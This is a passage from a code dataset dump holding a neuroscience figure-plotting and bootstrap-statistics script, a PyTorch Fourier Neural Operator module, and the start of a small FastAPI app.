len(tempCond)):\n add[i, j] = add[i, j - 1]*2\n\n# plot specs/adjustments\nstart = 50\nend = 700\nsep = 100\n\n# fontsizes\nfontsize_tick = 20\nfontsize_legend = 20\nfontsize_label = 20\n\n# initiate legend data holders\nline = []\nmarker = []\nmarker_pred = []\n\n# plot styles\nalpha = np.linspace(0.2, 1, len(tempCond))\nlinestyle = ['solid', 'solid', 'solid']\nlw = 2\n\n# metrics scatter points\ns = 120\n\n# y limits\ny_lim_in_isolation = [[-0.2, 1.1], [-0.2, 1.1], [-0.2, 1.1]]\ny_lim_recovery = [25, 120]\ny_lim_metrics = [-0.5, 2.7]\n\n# compute timepoint of the start of both first and second pulse\nstart_1 = timepoints_twopulse[0, 0]\n\n# adjust axes\nax['broadband'].spines['top'].set_visible(False)\nax['broadband'].spines['right'].set_visible(False)\nax['broadband'].tick_params(axis='both', which='major', labelsize=fontsize_tick)\nax['broadband'].axhline(0, color='grey', lw=0.5, alpha=0.5)\nax['broadband'].set_ylim(-0.2, 1.1)\n# ax['broadband'].set_ylabel('Neural data', fontsize=fontsize_label)\n\nax['broadband_pred'].spines['top'].set_visible(False)\nax['broadband_pred'].spines['right'].set_visible(False)\nax['broadband_pred'].tick_params(axis='both', which='major', labelsize=fontsize_tick)\nax['broadband_pred'].axhline(0, color='grey', lw=0.5, alpha=0.5)\nax['broadband_pred'].set_ylim(-0.2, 1.1)\n# 
ax['broadband_pred'].set_xlabel('ISI (ms)', fontsize=fontsize_label)\n# ax['broadband_pred'].set_ylabel('DN model', fontsize=fontsize_label)\n\nfor i in range(len(ax_broadband_isolation)):\n ax_broadband_isolation[i].spines['top'].set_visible(False)\n ax_broadband_isolation[i].spines['right'].set_visible(False)\n ax_broadband_isolation[i].tick_params(axis='both', which='major', labelsize=fontsize_tick)\n ax_broadband_isolation[i].axhline(0, color='grey', lw=0.5, alpha=0.5)\n ax_broadband_isolation[i].set_xlabel('Time (ms)', fontsize=fontsize_label)\n ax_broadband_isolation[i].set_ylim(y_lim_in_isolation[i])\n ax_broadband_isolation[i].set_xticks([0, 200])\n # ax_broadband_isolation[i].set_title('Neural data', fontsize=fontsize_title)\n # if i == 0:\n # ax_broadband_isolation[i].set_ylabel('Change in power (x-fold)', fontsize=fontsize_label)\n\nfor i in range(len(ax_broadband_isolation_pred)):\n ax_broadband_isolation_pred[i].spines['top'].set_visible(False)\n ax_broadband_isolation_pred[i].spines['right'].set_visible(False)\n ax_broadband_isolation_pred[i].tick_params(axis='both', which='major', labelsize=fontsize_tick)\n ax_broadband_isolation_pred[i].axhline(0, color='grey', lw=0.5, alpha=0.5)\n ax_broadband_isolation_pred[i].set_xlabel('Time (ms)', fontsize=fontsize_label)\n ax_broadband_isolation_pred[i].set_ylim(y_lim_in_isolation[i])\n ax_broadband_isolation_pred[i].set_yticklabels([])\n ax_broadband_isolation_pred[i].set_xticks([0, 200])\n # ax_broadband_isolation_pred[i].set_title('DN model', fontsize=fontsize_title)\n\n# ax['ISI_recovery'].set_xlabel('ISI (ms)', fontsize=fontsize_label)\n# ax['ISI_recovery'].set_ylabel('Recovery (%)', fontsize=fontsize_label)\nax['ISI_recovery'].set_ylim(y_lim_recovery)\nax['ISI_recovery'].axhline(100, color='grey', linestyle='dotted')\nax['ISI_recovery'].tick_params(axis='both', which='major', labelsize=fontsize_tick)\nax['ISI_recovery'].set_xticks(add[1, :])\nax['ISI_recovery'].set_xticklabels(label_tempCond, rotation=45)\nax['ISI_recovery'].spines['top'].set_visible(False)\nax['ISI_recovery'].spines['right'].set_visible(False)\nif preference == 0:\n ax['ISI_recovery'].set_ylim(20, 120)\nelif preference == 1:\n ax['ISI_recovery'].set_ylim(10, 120)\nelif preference == 2:\n ax['ISI_recovery'].set_ylim(20, 120)\n\n# ax['ISI_recovery_pred'].set_xlabel('ISI (ms)', fontsize=fontsize_label)\n# ax['ISI_recovery_pred'].set_ylabel('Recovery (%)', fontsize=fontsize_label)\nax['ISI_recovery_pred'].set_ylim(y_lim_recovery)\nax['ISI_recovery_pred'].axhline(100, color='grey', linestyle='dotted')\nax['ISI_recovery_pred'].tick_params(axis='both', which='major', labelsize=fontsize_tick)\nax['ISI_recovery_pred'].set_xticks(add[1, :])\nax['ISI_recovery_pred'].set_xticklabels(label_tempCond, rotation=45)\nax['ISI_recovery_pred'].spines['top'].set_visible(False)\nax['ISI_recovery_pred'].spines['right'].set_visible(False)\nif preference == 0:\n ax['ISI_recovery_pred'].set_ylim(20, 120)\nelif preference == 1:\n ax['ISI_recovery_pred'].set_ylim(10, 120)\nelif preference == 2:\n ax['ISI_recovery_pred'].set_ylim(20, 120)\n\nax['adaptation'].spines['top'].set_visible(False)\nax['adaptation'].spines['right'].set_visible(False)\nax['adaptation'].set_xticks(np.arange(len(VA))+0.1)\nax['adaptation'].set_xlim(y_lim_metrics)\nax['adaptation'].tick_params(axis='both', which='major', labelsize=fontsize_tick)\nax['adaptation'].set_xticklabels(VA_labels, fontsize=fontsize_label)\n# ax['adaptation'].set_ylabel('Avg. 
recovery (%)', fontsize=fontsize_label)\nif preference == 0:\n ax['adaptation'].set_ylim(30, 80)\nelif preference == 1:\n ax['adaptation'].set_ylim(30, 80)\nelif preference == 2:\n ax['adaptation'].set_ylim(30, 80)\n\nax['intercept'].spines['top'].set_visible(False)\nax['intercept'].spines['right'].set_visible(False)\nax['intercept'].set_xticks(np.arange(len(VA))+0.1)\nax['intercept'].set_xlim(y_lim_metrics)\nax['intercept'].tick_params(axis='both', which='major', labelsize=fontsize_tick)\nax['intercept'].set_xticklabels(VA_labels, fontsize=fontsize_label)\n# ax['intercept'].set_ylabel('Long-term recovery (%)', fontsize=fontsize_label)\nif preference == 0:\n ax['intercept'].set_ylim(55, 110)\nelif preference == 1:\n ax['intercept'].set_ylim(45, 120)\nelif preference == 2:\n ax['intercept'].set_ylim(55, 120)\n\n# plot first pulse in isolation\nmax_data = [0, 0, 0]\nmax_model = [0, 0, 0]\nfor i in range(len(VA)):\n\n # NEURAL DATA\n data_pulse1 = np.mean(broadband_pulse1_bootstrap[i], axis=0)\n max_data[i] = max(data_pulse1)\n data_temp = gaussian_filter1d(data_pulse1[start_1 - start: start_1 - start + time_window]/max_data[i], 10)\n ax_broadband_isolation[i].plot(np.arange(time_window), data_temp, color='black', zorder=1)\n\n # MODEL\n data_pulse1 = np.mean(broadband_pulse1_pred_bootstrap[i], axis=0)\n max_model[i] = max(data_pulse1)\n model_temp = gaussian_filter1d(data_pulse1[start_1 - start: start_1 - start + time_window]/max_model[i], 10)\n ax_broadband_isolation_pred[i].plot(np.arange(time_window), model_temp, color='black', zorder=1)\n\n# plot stimulus timecourse and time courses of neural data & model\nt_zero = np.argwhere(t > 0)[0][0]\nt_twohundred = np.argwhere(t > 0.5)[0][0]\n\nx_label_single = ['0', '500']\n\nxtick_idx = []\nfor i in range(len(tempCond)):\n\n # append x-tick\n xtick_idx = xtick_idx + ([i*(end+sep) + t_zero, i*(end+sep) + t_twohundred])\n\n # compute timepoint of the start of both first and second pulse\n start_2 = timepoints_twopulse[i, 2]\n\n for j in range(len(VA)):\n # for j in range(1):\n\n # plot stimulus timecourse\n if (j == 0) & (i == 0):\n ax['broadband'].axvspan(i*(end+sep) - start + timepoints_twopulse[i, 0], i*(\n end+sep) - start + timepoints_twopulse[i, 1], facecolor='grey', alpha=0.2, label='stimulus')\n ax['broadband'].axvspan(i*(end+sep) - start + timepoints_twopulse[i, 2], i*(\n end+sep) - start + timepoints_twopulse[i, 3], facecolor='grey', alpha=0.2)\n ax['broadband_pred'].axvspan(i*(end+sep) - start + timepoints_twopulse[i, 0], i*(\n end+sep) - start + timepoints_twopulse[i, 1], facecolor='grey', alpha=0.2, label='stimulus')\n ax['broadband_pred'].axvspan(i*(end+sep) - start + timepoints_twopulse[i, 2], i*(\n end+sep) - start + timepoints_twopulse[i, 3], facecolor='grey', alpha=0.2)\n elif (j == 0):\n ax['broadband'].axvspan(i*(end+sep) - start + timepoints_twopulse[i, 0], i*(\n end+sep) - start + timepoints_twopulse[i, 1], facecolor='grey', alpha=0.2)\n ax['broadband'].axvspan(i*(end+sep) - start + timepoints_twopulse[i, 2], i*(\n end+sep) - start + timepoints_twopulse[i, 3], facecolor='grey', alpha=0.2)\n ax['broadband_pred'].axvspan(i*(end+sep) - start + timepoints_twopulse[i, 0], i*(\n end+sep) - start + timepoints_twopulse[i, 1], facecolor='grey', alpha=0.2)\n ax['broadband_pred'].axvspan(i*(end+sep) - start + timepoints_twopulse[i, 2], i*(\n end+sep) - start + timepoints_twopulse[i, 3], facecolor='grey', alpha=0.2)\n \n # select data\n data_temp = gaussian_filter1d(np.mean(broadband_bootstrap[j][:, i, :], axis=0), 10)\n model_temp = 
gaussian_filter1d(np.mean(broadband_pred_bootstrap[j][:, i, :], axis=0), 10)\n\n # plot broadband timecourse per visual area\n if i == 0:\n\n # plot broadband per visual area\n ax['broadband'].plot(np.arange(end - start)+i*(end+sep), data_temp[start:end], color=np.array(colors_VA[j])/255, label=VA_labels[j], lw=lw)\n\n # plot broadband per visual area\n ax['broadband_pred'].plot(np.arange(end - start)+i*(end+sep), model_temp[start:end], color=np.array(colors_VA[j])/255, label=VA_labels[j], lw=lw)\n\n else:\n\n # plot broadband per visual area\n ax['broadband'].plot(np.arange(end - start)+i*(end+sep), data_temp[start:end], color=np.array(colors_VA[j])/255, lw=lw)\n\n # plot broadband per visual area\n ax['broadband_pred'].plot(np.arange(end - start)+i*(end+sep), model_temp[start:end], color=np.array(colors_VA[j])/255, lw=lw)\n\n # plot variance (68% confidence interval)\n data_std_bootstrap = np.zeros((len(data_temp[start:end]), 2))\n model_std_bootstrap = np.zeros((len(data_temp[start:end]), 2))\n for t in range(len(data_temp[start:end])):\n data_std_bootstrap[t, :] = np.nanpercentile(broadband_bootstrap[j][:, i, start+t], [CI_low, CI_high])\n model_std_bootstrap[t, :] = np.nanpercentile(broadband_pred_bootstrap[j][:, i, start+t], [CI_low, CI_high])\n ax['broadband'].fill_between(np.arange(end - start)+i*(end+sep), gaussian_filter1d(data_std_bootstrap[:, 0], 10), gaussian_filter1d(data_std_bootstrap[:, 1], 10), color=np.array(colors_VA[j])/255, edgecolor=None, alpha=0.3)\n ax['broadband_pred'].fill_between(np.arange(end - start)+i*(end+sep), gaussian_filter1d(model_std_bootstrap[:, 0], 10), gaussian_filter1d(model_std_bootstrap[:, 1], 10), color=np.array(colors_VA[j])/255, edgecolor=None, alpha=0.3)\n\n # plot stimulus in isolation\n # NEURAL DATA\n data_pulse2 = gaussian_filter1d(np.mean(broadband_pulse2_bootstrap[j][:, i, :], axis=0)/max_data[j], 10)\n ax_broadband_isolation[j].plot(np.arange(time_window), data_pulse2[start_2 - start: start_2 - start + time_window], color=np.array(colors_VA[j])/255, alpha=alpha[i])\n\n # MODEL\n model_pulse2 = gaussian_filter1d(np.mean(broadband_pulse2_pred_bootstrap[j][:, i, :], axis=0)/max_model[j], 10)\n ax_broadband_isolation_pred[j].plot(np.arange(time_window), model_pulse2[start_2 - start: start_2 - start + time_window], color=np.array(colors_VA[j])/255, alpha=alpha[i])\n\n # plot mean data points\n # NEURAL DATA\n if i == 0:\n data_temp = ISI_recovery_avg[j, i]*100\n marker_temp = ax['ISI_recovery'].scatter(add[j, i], data_temp, color=np.array(colors_VA[j])/255, edgecolor='white', marker='o', s=150)\n marker.append(marker_temp)\n else:\n data_temp = ISI_recovery_avg[j, i]*100\n ax['ISI_recovery'].scatter(add[j, i], data_temp, color=np.array(colors_VA[j])/255, edgecolor='white', marker='o', s=150)\n\n error_min = ISI_recovery_CI[j, i, 0]*100\n error_max = ISI_recovery_CI[j, i, 1]*100\n ax['ISI_recovery'].plot([add[j, i], add[j, i]], [error_min, error_max], color='black', zorder=1)\n\n # MODEL\n if i == 0:\n data_temp = ISI_recovery_pred_avg[j, i]*100\n marker_temp = ax['ISI_recovery_pred'].scatter(add[j, i], data_temp, color=np.array(colors_VA[j])/255, edgecolor='white', marker='^', s=150)\n marker_pred.append(marker_temp)\n else:\n data_temp = ISI_recovery_pred_avg[j, i]*100\n ax['ISI_recovery_pred'].scatter(add[j, i], data_temp, color=np.array(colors_VA[j])/255, edgecolor='white', marker='^', s=150)\n\n error_min = ISI_recovery_pred_CI[j, i, 0]*100\n error_max = ISI_recovery_pred_CI[j, i, 1]*100\n ax['ISI_recovery_pred'].plot([add[j, i], add[j, 
i]], [error_min, error_max], color='black', zorder=1)\n\n# plot recovery curve\nfor i in range(len(VA)):\n# for i in range(1):\n\n line_temp, = ax['ISI_recovery'].plot(t1_plot/1000, ISI_recovery_log[i, :]*100, color=np.array(colors_VA[i])/255, zorder=-5, linestyle=linestyle[i])\n ax['ISI_recovery_pred'].plot(t1_plot/1000, ISI_recovery_pred_log[i, :]*100, color=np.array(colors_VA[i])/255, zorder=-5, linestyle=linestyle[i])\n line.append(line_temp)\n\n# add ticks\nax['broadband'].set_xticks(xtick_idx)\nax['broadband'].set_xticklabels([])\nax['broadband'].legend(bbox_to_anchor=(0,1.02,1,0.2), loc=\"lower left\", borderaxespad=0, ncol=4, frameon=False, fontsize=fontsize_legend)\n\nax['broadband_pred'].set_xticks(xtick_idx)\nax['broadband_pred'].set_xticklabels(np.tile(x_label_single, 6))\nax['broadband_pred'].set_xlabel('Time (ms)', fontsize=fontsize_label)\n\n# plot bargraph (slope log-linear fit)\nerror_min = adaptation_CI[:, 0]*100\nerror_max = adaptation_CI[:, 1]*100\nax['adaptation'].scatter(np.arange(len(VA)), adaptation_avg*100, color=np.array(colors_VA)/255, s=s)\nax['adaptation'].plot([np.arange(len(VA)), np.arange(len(VA))], [error_min, error_max], color='k', zorder=1)\n\nerror_min = adaptation_pred_CI[:, 0]*100\nerror_max = adaptation_pred_CI[:, 1]*100\nax['adaptation'].scatter(np.arange(len(VA))+0.2, adaptation_pred_avg*100, color=np.array(colors_VA)/255, s=s, marker='^')\nax['adaptation'].plot([np.arange(len(VA))+0.2, np.arange(len(VA))+0.2], [error_min, error_max], color='black', zorder=1)\n\n# plot bargraph (slope log-linear fit)\nerror_min = intercept_CI[:, 0]*100\nerror_max = intercept_CI[:, 1]*100\nax['intercept'].scatter(np.arange(len(VA)), intercept_avg*100, color=np.array(colors_VA)/255, s=s)\nax['intercept'].plot([np.arange(len(VA)), np.arange(len(VA))], [error_min, error_max], color='k', zorder=1)\n\nerror_min = intercept_pred_CI[:, 0]*100\nerror_max = intercept_pred_CI[:, 1]*100\nax['intercept'].scatter(np.arange(len(VA))+0.2, intercept_pred_avg*100, color=np.array(colors_VA)/255, s=s, marker='^')\nax['intercept'].plot([np.arange(len(VA))+0.2, np.arange(len(VA))+0.2], [error_min, error_max], color='black', zorder=1)\n\n# add legend to tempCond recovery plot\nvertical_line1 = lines.Line2D([], [], color='black', marker='|', linestyle='None', markersize=30)\nvertical_line2 = lines.Line2D([], [], color='black', marker='|', linestyle='None', markersize=30) \nvertical_line3 = lines.Line2D([], [], color='black', marker='|', linestyle='None', markersize=30) \nax['ISI_recovery'].legend([(vertical_line1, marker[0], line[0]), (vertical_line2 , marker[1], line[1]), (vertical_line3 , marker[2], line[2])], [VA_labels[0], VA_labels[1], VA_labels[2]], loc='upper left', ncol=3, frameon=False, fontsize=fontsize_legend)\nax['ISI_recovery_pred'].legend([(vertical_line1, marker_pred[0], line[0]), (vertical_line2 , marker_pred[1], line[1]), (vertical_line3 , marker_pred[2], line[2])], [VA_labels[0], VA_labels[1], VA_labels[2]], loc='upper left', ncol=3, frameon=False, fontsize=fontsize_legend)\n\n# save figure\nplt.tight_layout()\nplt.savefig(dir+'mkFigure/Fig5_6_' + img_type + '.svg', format='svg', bbox_inches='tight')\nplt.savefig(dir+'mkFigure/Fig5_6_' + img_type, dpi=300, bbox_inches='tight')\n# plt.show()\n\n############################################################################\n######################################################## STATISTICAL TESTING\n\nalpha = 0.0083\n\nmetrics = ['Avg. 
adaptation', 'Intercept']\nfor i in range(2):\n\n print(30*'--')\n print(metrics[i])\n\n if i == 0: # avg. adaptation\n\n print('#'*30)\n print('NEURAL DATA')\n\n # early vs. ventral\n sample1 = adaptation_medians[0, :]\n sample2 = adaptation_medians[1, :]\n param_diffs = sample1 - sample2\n\n p = np.min([len(param_diffs[param_diffs < 0]), len(param_diffs[param_diffs > 0])])/B_repetitions\n if p < alpha:\n print('V1-3 vs. VOTC: ', p, ' SIGNIFICANT')\n else:\n print('V1-3 vs. VOTC: ', p)\n\n # early vs. LO\n sample1 = adaptation_medians[0, :]\n sample2 = adaptation_medians[2, :]\n param_diffs = sample1 - sample2\n\n p = np.min([len(param_diffs[param_diffs < 0]), len(param_diffs[param_diffs > 0])])/B_repetitions\n if p < alpha:\n print('V1-3 vs. LOTC: ', p, ' SIGNIFICANT')\n else:\n print('V1-3 vs. LOTC: ', p)\n\n # ventral vs. LO\n sample1 = adaptation_medians[1, :]\n sample2 = adaptation_medians[2, :]\n param_diffs = sample1 - sample2\n\n p = np.min([len(param_diffs[param_diffs < 0]), len(param_diffs[param_diffs > 0])])/B_repetitions\n if p < alpha:\n print('VOTC vs. LOTC: ', p, ' SIGNIFICANT')\n else:\n print('VOTC vs. LOTC: ', p)\n\n print('#'*30)\n print('MODEL')\n\n # early vs. ventral\n sample1 = adaptation_pred_medians[0, :]\n sample2 = adaptation_pred_medians[1, :]\n param_diffs = sample1 - sample2\n\n p = np.min([len(param_diffs[param_diffs < 0]), len(param_diffs[param_diffs > 0])])/B_repetitions\n if p < alpha:\n print('V1-3 vs. VOTC: ', p, ' SIGNIFICANT')\n else:\n print('V1-3 vs. VOTC: ', p)\n\n # early vs. LO\n sample1 = adaptation_pred_medians[0, :]\n sample2 = adaptation_pred_medians[2, :]\n param_diffs = sample1 - sample2\n\n p = np.min([len(param_diffs[param_diffs < 0]), len(param_diffs[param_diffs > 0])])/B_repetitions\n if p < alpha:\n print('V1-3 vs. LOTC: ', p, ' SIGNIFICANT')\n else:\n print('V1-3 vs. LOTC: ', p)\n\n # ventral vs. LO\n sample1 = adaptation_pred_medians[1, :]\n sample2 = adaptation_pred_medians[2, :]\n param_diffs = sample1 - sample2\n\n p = np.min([len(param_diffs[param_diffs < 0]), len(param_diffs[param_diffs > 0])])/B_repetitions\n if p < alpha:\n print('VOTC vs. LOTC: ', p, ' SIGNIFICANT')\n else:\n print('VOTC vs. LOTC: ', p)\n\n elif i == 1: # intercept`\n\n print('#'*30)\n print('NEURAL DATA')\n\n # early vs. ventral\n sample1 = intercept_medians[0, :]\n sample2 = intercept_medians[1, :]\n param_diffs = sample1 - sample2\n\n p = np.min([len(param_diffs[param_diffs < 0]), len(param_diffs[param_diffs > 0])])/B_repetitions\n if p < alpha:\n print('V1-3 vs. VOTC: ', p, ' SIGNIFICANT')\n else:\n print('V1-3 vs. VOTC: ', p)\n\n # early vs. LO\n sample1 = intercept_medians[0, :]\n sample2 = intercept_medians[2, :]\n param_diffs = sample1 - sample2\n\n p = np.min([len(param_diffs[param_diffs < 0]), len(param_diffs[param_diffs > 0])])/B_repetitions\n if p < alpha:\n print('V1-3 vs. LOTC: ', p, ' SIGNIFICANT')\n else:\n print('V1-3 vs. LOTC: ', p)\n\n # ventral vs. LO\n sample1 = intercept_medians[1, :]\n sample2 = intercept_medians[2, :]\n param_diffs = sample1 - sample2\n\n p = np.min([len(param_diffs[param_diffs < 0]), len(param_diffs[param_diffs > 0])])/B_repetitions\n if p < alpha:\n print('VOTC vs. LOTC: ', p, ' SIGNIFICANT')\n else:\n print('VOTC vs. LOTC: ', p)\n\n print('#'*30)\n print('MODEL')\n\n # early vs. 
ventral\n sample1 = intercept_pred_medians[0, :]\n sample2 = intercept_pred_medians[1, :]\n param_diffs = sample1 - sample2\n\n p = np.min([len(param_diffs[param_diffs < 0]), len(param_diffs[param_diffs > 0])])/B_repetitions\n if p < alpha:\n print('V1-3 vs. VOTC: ', p, ' SIGNIFICANT')\n else:\n print('V1-3 vs. VOTC: ', p)\n\n # early vs. LO\n sample1 = intercept_pred_medians[0, :]\n sample2 = intercept_pred_medians[2, :]\n param_diffs = sample1 - sample2\n\n p = np.min([len(param_diffs[param_diffs < 0]), len(param_diffs[param_diffs > 0])])/B_repetitions\n if p < alpha:\n print('V1-3 vs. LOTC: ', p, ' SIGNIFICANT')\n else:\n print('V1-3 vs. LOTC: ', p)\n\n # ventral vs. LO\n sample1 = intercept_pred_medians[1, :]\n sample2 = intercept_pred_medians[2, :]\n param_diffs = sample1 - sample2\n\n p = np.min([len(param_diffs[param_diffs < 0]), len(param_diffs[param_diffs > 0])])/B_repetitions\n if p < alpha:\n print('VOTC vs. LOTC: ', p, ' SIGNIFICANT')\n else:\n print('VOTC vs. LOTC: ', p)","repo_name":"ABra1993/tAdaptation_ECoG","sub_path":"mkFigure5_6.py","file_name":"mkFigure5_6.py","file_ext":"py","file_size_in_byte":45627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"33193327051","text":"########################################################################################################################\n# #\n# 2D Fourier network from #\n# \"Fourier Neural Operator for Parametric Partial Differential Equations\" #\n# by Zongyi Li et. al., https://arxiv.org/abs/2010.08895 #\n# https://github.com/zongyi-li/fourier_neural_operator/blob/master/fourier_2d.py #\n# #\n# Ekhi Ajuria, Guillaume Bogopolsky, CERFACS, 19.01.2021 #\n# #\n########################################################################################################################\n\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.fft\nfrom torch.nn.parameter import Parameter\n\nimport operator\nfrom functools import partial, reduce\n\n\n# Complex multiplication\ndef compl_mul2d(a, b):\n # (batch, in_channel, x,y ), (in_channel, out_channel, x,y) -> (batch, out_channel, x,y)\n op = partial(torch.einsum, \"bixy,ioxy->boxy\")\n return torch.stack([\n op(a[..., 0], b[..., 0]) - op(a[..., 1], b[..., 1]),\n op(a[..., 1], b[..., 0]) + op(a[..., 0], b[..., 1])\n ], dim=-1)\n\n# Ensurer periodicity\ndef mirror(x):\n double_size = []\n # The input is supposed of dim 4 (bsz, channels, H, W)\n for i, size in enumerate(list(x.size())):\n if i < 2:\n double_size.append(size)\n # Only double up H and W\n else:\n double_size.append(int(2 * size -1))\n\n # Tensor and mesh_size declaration\n mirror = torch.zeros(double_size)\n mesh_size = x.size(3)\n\n # convert to numpy\n mirror_np = mirror.cpu().numpy() \n x_np = x.cpu().numpy()\n\n # Mirroring\n mirror_np[:, :, mesh_size - 1 :, mesh_size - 1 :] = x_np[:,:]\n mirror_np[:, :, : mesh_size - 1, : mesh_size - 1] = x_np[:, :, -1:0:-1, -1:0:-1]\n mirror_np[:, :, mesh_size - 1 :, : mesh_size - 1] = - x_np[:, :, :, -1:0:-1]\n mirror_np[:, :, : mesh_size - 1, mesh_size - 1 :] = - x_np[:, :, -1:0:-1, :]\n\n # Reconvert to torch\n mirror = torch.from_numpy(mirror_np).cuda()\n x = torch.from_numpy(x_np).cuda()\n\n return mirror\n\n# Not that useful, but just in case, takes simple and doubled up domains.\ndef unmirror(x_small, x_big):\n # Declaration os tensor and mesh size\n unmirrored = torch.zeros_like(x_small)\n mesh_size = x_small.size(3)\n\n # Take correct cuadrant! 
\n unmirrored[:,:] = x_big[:,:, mesh_size - 1 :, mesh_size - 1 :]\n return unmirrored\n\n################################################################\n# Fourier layer\n################################################################\n\nclass _SpectralConv2d(nn.Module):\n def __init__(self, in_channels, out_channels, modes1, modes2):\n super(_SpectralConv2d, self).__init__()\n\n \"\"\"\n 2D Fourier layer. It does FFT, linear transform, and Inverse FFT. \n \"\"\"\n\n self.in_channels = in_channels\n self.out_channels = out_channels\n self.modes1 = modes1 # Number of Fourier modes to multiply, at most floor(N/2) + 1\n self.modes2 = modes2\n\n self.scale = (1 / (in_channels * out_channels))\n self.weights1 = nn.Parameter(self.scale * torch.rand(in_channels, out_channels, self.modes1, self.modes2, 2))\n self.weights2 = nn.Parameter(self.scale * torch.rand(in_channels, out_channels, self.modes1, self.modes2, 2))\n\n def forward(self, x):\n batchsize = x.shape[0]\n # Compute Fourier coeffcients up to factor of e^(- something constant)\n # x_ft = torch.fft.rfft(x, 2, norm=\"forward\")\n x_ft = torch.rfft(x, 2, normalized=True, onesided=True)\n\n # Multiply relevant Fourier modes\n out_ft = torch.zeros(batchsize, self.in_channels, x.size(-2), x.size(-1)//2 + 1, 2, device=x.device)\n out_ft[:, :, :self.modes1, :self.modes2] = \\\n compl_mul2d(x_ft[:, :, :self.modes1, :self.modes2], self.weights1)\n out_ft[:, :, -self.modes1:, :self.modes2] = \\\n compl_mul2d(x_ft[:, :, -self.modes1:, :self.modes2], self.weights2)\n\n # Return to physical space\n x = torch.irfft(out_ft, 2, normalized=True, onesided=True, signal_sizes=( x.size(-2), x.size(-1)))\n # x = torch.fft.irfft(out_ft, 2, norm=\"forward\", signal_sizes=( x.size(-2), x.size(-1)))\n return x\n\n\nclass _SimpleBlock2d(nn.Module):\n def __init__(self, data_channels, modes1, modes2, width):\n super(_SimpleBlock2d, self).__init__()\n\n \"\"\"\n The overall network. It contains 4 layers of the Fourier layer.\n 1. Lift the input to the desire channel dimension by self.fc0 .\n 2. 4 layers of the integral operators u' = (W + K)(u).\n W defined by self.w; K defined by self.conv .\n 3. 
Project from the channel space to the output space by self.fc1 and self.fc2 .\n \n input: the solution of the coefficient function and locations (a(x, y), x, y)\n input shape: (batchsize, x=s, y=s, c=3)\n output: the solution \n output shape: (batchsize, x=s, y=s, c=1)\n \"\"\"\n\n self.modes1 = modes1\n self.modes2 = modes2\n self.width = width\n self.data_channels = data_channels\n self.fc0 = nn.Linear(self.data_channels, self.width) # input channel is 3: (a(x, y), x, y)\n\n self.conv0 = _SpectralConv2d(self.width, self.width, self.modes1, self.modes2)\n self.conv1 = _SpectralConv2d(self.width, self.width, self.modes1, self.modes2)\n self.conv2 = _SpectralConv2d(self.width, self.width, self.modes1, self.modes2)\n self.conv3 = _SpectralConv2d(self.width, self.width, self.modes1, self.modes2)\n self.w0 = nn.Conv1d(self.width, self.width, 1)\n self.w1 = nn.Conv1d(self.width, self.width, 1)\n self.w2 = nn.Conv1d(self.width, self.width, 1)\n self.w3 = nn.Conv1d(self.width, self.width, 1)\n self.bn0 = torch.nn.BatchNorm2d(self.width)\n self.bn1 = torch.nn.BatchNorm2d(self.width)\n self.bn2 = torch.nn.BatchNorm2d(self.width)\n self.bn3 = torch.nn.BatchNorm2d(self.width)\n\n self.fc1 = nn.Linear(self.width, 128)\n self.fc2 = nn.Linear(128, 1)\n\n def forward(self, x):\n\n # Double up the domain to ensure periodicity\n # save small domain just in case (not that necessary, but just in case)\n x_small = x\n x = mirror(x)\n\n batchsize = x.shape[0]\n size_x, size_y = x.shape[2], x.shape[3]\n\n x = x.permute(0, 2, 3, 1)\n x = self.fc0(x)\n x = x.permute(0, 3, 1, 2)\n\n x1 = self.conv0(x)\n x2 = self.w0(x.view(batchsize, self.width, -1)).view(batchsize, self.width, size_x, size_y)\n x = self.bn0(x1 + x2)\n x = F.relu(x)\n x1 = self.conv1(x)\n x2 = self.w1(x.view(batchsize, self.width, -1)).view(batchsize, self.width, size_x, size_y)\n x = self.bn1(x1 + x2)\n x = F.relu(x)\n x1 = self.conv2(x)\n x2 = self.w2(x.view(batchsize, self.width, -1)).view(batchsize, self.width, size_x, size_y)\n x = self.bn2(x1 + x2)\n x = F.relu(x)\n x1 = self.conv3(x)\n x2 = self.w3(x.view(batchsize, self.width, -1)).view(batchsize, self.width, size_x, size_y)\n x = self.bn3(x1 + x2)\n\n x = x.permute(0, 2, 3, 1)\n x = self.fc1(x)\n x = x.permute(0, 3, 1, 2)\n x = F.relu(x)\n x = x.permute(0, 2, 3, 1)\n x = self.fc2(x)\n x = x.permute(0, 3, 1, 2)\n\n # Take the correct cuadrant!\n x = unmirror(x_small, x)\n\n return x\n\n\nclass FourierNet2D(nn.Module):\n \"\"\"\n A wrapper class\n \"\"\"\n def __init__(self, data_channels, modes, width):\n super(FourierNet2D, self).__init__()\n self.conv1 = _SimpleBlock2d(data_channels, modes, modes, width)\n\n def forward(self, x):\n x = self.conv1(x)\n # return x.squeeze()\n return x\n\n def count_params(self):\n c = 0\n for p in self.parameters():\n c += reduce(operator.mul, list(p.size()))\n\n return c\n","repo_name":"lionelchg/PlasmaNet","sub_path":"PlasmaNet/nnet/model/li_fourier_2d.py","file_name":"li_fourier_2d.py","file_ext":"py","file_size_in_byte":8597,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"78"} +{"seq_id":"37762049816","text":"import uvicorn\nfrom fastapi import FastAPI\n\nfrom src.config import settings\nfrom src.graphql_api import graphql_app\n\napp = FastAPI()\napp.include_router(graphql_app, prefix=\"/graphql\")\n\n\n@app.get(\"/\")\nasync def root():\n return {\"messagge\": settings.PORT}\n\n\nif __name__ == \"__main__\":\n uvicorn.run(\n \"main:app\",\n host=settings.HOST,\n reload=True,\n port=settings.PORT,\n 
